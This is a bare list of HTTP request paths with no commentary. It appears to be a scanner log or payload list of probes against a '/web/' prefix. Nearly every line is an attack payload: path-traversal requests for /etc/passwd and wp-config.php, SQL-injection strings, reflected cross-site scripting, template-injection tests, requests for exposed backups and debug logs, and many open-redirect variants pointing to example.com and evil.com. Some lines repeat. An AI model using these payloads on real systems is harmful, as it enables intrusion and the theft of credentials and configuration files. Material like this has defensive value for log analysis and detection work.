/web/download.do?file=../../../../config.text
/web/wp-content/uploads/database-backups/
/web/wp-config.php.inc
/web/install/includes/configure.php
/web/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com
/web/?author=1
/web/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20
/web/scrm/crm/admin
/web/servicedesk/customer/user/signup
/web/
/web/wp-admin/setup-config.php?step=1
/web/api/v1/method.callAnon/cve_exploit
/web/jolokia/
/web/wp-content/plugins/simple-file-list/ee-upload-engine.php
/web/api/v1/method.callAnon/cve_exploit
/web
/web/wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip
/web/wp-content/plugins/simple-file-list/ee-file-engine.php
/web/wp-content/debug.log
/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=
/web
/web/search?search_key=%7B%7B1337*1338%7D%7D
/web/wp-json/wp/v2/lesson/1
/web/.example.com
/web//%5cexample.com
/web/ws/v1/cluster/apps/new-application
/web/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload
/web/api/user/reg
/web/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd
/web/wp-content/plugins/wp-mail-smtp-pro/
/web/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E&mimetype=text/html
/web/wp-config.php.inc
/web/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20
/web/?wptouch_switch=desktop&redirect=https://example.com/
/web/lib///....//....//....//....//....//....//....//....//etc//passwd
/web/download.do?file=../../../../config.text
/web/wp-config.php.swp
/web/wp-admin/admin-ajax.php?action=action_name
/web/wp-content/uploads/database-backups/
/web/wp-content/plugins/bbpress/
/web/index.php?action=login.index
/web/
/web/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/web/wp-content/debug.log
/web/xmlrpc/pingback
/web/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com
/web/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei
/web/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/
/web/jolokia/
/web/servicedesk/customer/user/signup
/web/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
/web/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com
/web/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa
/web/?author=1
/web/api/v1/method.callAnon/cve_exploit
/web/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1
/web/api/group/list
/web/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`
/web/wp-json/wp/v2/lesson/1
/web/////%5C;@example.com
/web/hedwig.cgi
/web/etc/passwd
/web/api/login
/web/wp-content/plugins/simple-file-list/ee-file-engine.php
/web/webtools/control/main
/web/wp-config.php.html
/web/?a=display&templateFile=README.md
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/web/zms/admin/index.php
/web/search?search_key=%7B%7B1337*1338%7D%7D
/web/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1
/web/wp-content/uploads/simple-file-list/nuclei.php
/web/////example.com
/web/cgi-bin/slogin/login.py
/web/wp-content/themes/eatery/nav.php?-Menu-=https://example.com/
/web/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/portal/info.jsp
/web/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-includes/rss-functions.php
/web/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
/web/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-content/plugins/bbpress/
/web/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg
/web/wp-config-backup.txt
/web/rest/api/2/dashboard?maxResults=100
/web/compress.php?file=../../../../../../../etc/passwd
/web/index.php?action=login.index
/web/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/
/web/wp-content/plugins/lifterlms/
/web/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/web/?author=1
/web/xmlrpc/pingback
/web/api/sso/v2/sso/jwt?error_url=http://evil.com
/web/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
/web/ftb.imagegallery.aspx
/web/api/downloads?fileName=../../../../../../../../etc/passwd
/web/phpwiki/index.php/passwd
/web/lib/crud/userprocess.php
/web/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com
/web/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/web/
/web/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`
/web/
/web/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css
/web/etc/passwd
/web/api/login
/web/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com
/web/hedwig.cgi
/web/..%5cetc/passwd
/web/..%5c..%5cetc/passwd
/web/..%5c..%5c..%5cetc/passwd
/web/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
/web/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/web/zms/admin/index.php
/web/cgi-bin/slogin/login.py
/web/////example.com
/web/..%5c..%5c..%5c..%5cetc/passwd
/web////example.com
/web/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/web/portal/info.jsp
/web/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
/web/qcubed/assets/php/_devtools/installer/step_2.php?installation_path=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/web/wp-config-backup.txt
/web/wp-config.php.save
/web/compress.php?file=../../../../../../../etc/passwd
/web/wp-content/plugins/lifterlms/
/web/wp-config.php~
/web/api/sso/v2/sso/jwt?error_url=http://evil.com
/web/phpwiki/index.php/passwd
/web/ftb.imagegallery.aspx
/web/lib/crud/userprocess.php
/web/api/downloads?fileName=../../../../../../../../etc/passwd
/web/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/web/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css
/web/
/web/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com
/web/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com
/web/..%5c..%5c..%5c..%5cetc/passwd
/web////example.com
/web/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
/web////example.com/%2f%2e%2e
/web/..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/wp-config.php~
/web/wp-config.php-backup
/web/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com
/web/wp-config.php.orig
/web////example.com/%2f%2e%2e
/web/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com
/web////example.com@/
/web/wp-config.php.original
/web/_wpeprivate/config.json
/web/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com
/web////example.com@/
/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com
/web////http://192.168.1.104example.com/%2f%2e%2e
/web/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5cetc/passwd
/web/static/..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/./../../../../../../../../../../etc/passwd
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com
/web////http://192.168.1.104example.com/%2f%2e%2e
/web///;@example.com
/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/web/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/web///;@example.com
/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/web/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com
/web///%5C/example.com/
/web///%5C@example.com
/web///%5Cexample.com
/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web///%5Cexample.com
/web///%5Ctexample.com/
/web///example.com/%2F..
/web///example.com/%2F..
/web///example.com/
/web///example.com@/
/web///example.com%5Ctexample.com/
/web///https://example.com@/
/web//%3C%3E//example.com
/web//%5C/%5C/example.com/
/web//%5C/example.com
/web//%5Cexample.com
/web//example.com
/web//example.com/%2F..
/web//example.com/
/web//example.com/..;/css
/web//https:example.com
/web//http://192.168.1.104example.com/
/web//http://192.168.1.104example.com/
/web//%E3%80%B1example.com
/web//%E3%80%B5example.com
/web//%E3%82%9Dexample.com
/web//%E3%83%BCexample.com
/web//%E3%83%BCexample.com
/web//%EF%BD%B0example.com
/web/%3C%3E//example.com
/web/%3C%3E//example.com
/web/@example.com
/web/@https://example.com
/web/%5C/%5C/example.com/
/web/%5C/%5C/example.com/
/web/example%E3%80%82com
/web/example%E3%80%82com
/web/example.com
/web/example.com
/web/example.com/
/web/example.com/
/web/example.com/
/web/example.com;@
/web/example.com;@
/web/https%3a%2f%2fexample.com%2f
/web/https%3a%2f%2fexample.com%2f
/web/https:%0a%0dexample.com
/web/https://%0a%0dexample.com
/web/https://%0a%0dexample.com
/web/https://%09/example.com
/web/https://%2f%2f.example.com/
/web/https://%2f%2f.example.com/
/web/https://%3F.example.com/
/web/https://%5c%5c.example.com/
/web/https://%5cexample.com@
/web/https://%5cexample.com@
/web/https://%23.example.com/
/web/https://.example.com
/web/https://////example.com
/web/https://////example.com
/web/https:///example.com
/web/https:///example.com/%2e%2e
/web/https:///example.com/%2f%2e%2e
/web/https:///example.com/%2f%2e%2e
/web/https:///example.com@example.com/%2e%2e
/web/https:///example.com@example.com/%2f%2e%2e
/web/https://:80
/web/https://:80?@example.com/
/web/https://:@%5C@example.com
/web/https://:@example.com%5C@example.com
/web/https://:@example.com%5C@WillBeReplaced.com
/web/https://;@example.com
/web/https://%5Ctexample.com/
/web/https://example.com/example.com
/web/https://example.com/https://example.com/
/web/https://www.%5C.example.com
/web/https:/%5C/%5Cexample.com
/web/https:/%5Cexample.com
/web/https:/%5Cexample.com
/web/https:/example.com
/web/https:/example.com
/web/https:example.com
/web/http://192.168.1.104example.com
/web/%E3%80%B1example.com
/web/%E3%80%B5example.com
/web/%E3%82%9Dexample.com
/web/%E3%83%BCexample.com
/web/%EF%BD%B0example.com
/web/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com
